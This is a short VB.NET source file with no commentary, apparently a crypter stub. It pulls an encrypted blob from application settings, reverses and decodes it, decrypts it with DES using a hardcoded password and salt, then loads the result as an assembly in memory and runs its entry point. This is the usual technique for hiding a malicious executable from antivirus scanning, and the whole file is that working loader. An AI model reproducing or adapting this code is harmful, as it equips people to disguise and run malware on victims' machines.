Module Module1
    Sub Main()
        Dim H1 = System.Threading.Thread.GetDomain.Load(Decrypt(My.Settings.Setting)).EntryPoint.Invoke(0, New System.Buffer(1 - 2) {})
    End Sub
    Public Function Decrypt(ByVal Data As String) As Byte()

        Data = StrReverse(Data)

        Dim A1 = P2

        Dim A2() As Byte

        Dim A3() As Byte = P1

        Dim A4 As New System.Security.Cryptography.Rfc2898DeriveBytes("Pass", A3)

        A1.Key = A4.GetBytes(A1.Key.Length)

        A1.IV = A4.GetBytes(A1.IV.Length)

        Dim A5 As New IO.MemoryStream

        Dim A6 As New System.Security.Cryptography.CryptoStream(A5, A1.CreateDecryptor(), P3)

        A2 = UrlTokenDecode(Data)

        A6.Write(A2, 0, A2.Length)

        A6.Close()

        Data = ASCII(A5.ToArray)

        Dim H1 As Byte() = UrlTokenDecode(Data)

        Return H1
    End Function

    Public Function ASCII(ByVal Data As Byte()) As String

        Return System.Text.Encoding.ASCII.GetString(Data)

    End Function


    Public Function UrlTokenDecode(ByVal Data As String) As Byte()

        Return CType(GetType(System.Web.HttpServerUtility).GetMethod("UrlTokenDecode").Invoke(Nothing, {Data}), Byte())

    End Function


    Public P1 = New Byte() {2, 3, 4, 5, 6, 7, 8, 9}

    Public P2 = New System.Security.Cryptography.DESCryptoServiceProvider

    Public P3 = System.Security.Cryptography.CryptoStreamMode.Write
End Module

-------------------------------------------------------------------------------------------------

Reference:
System.Web.dll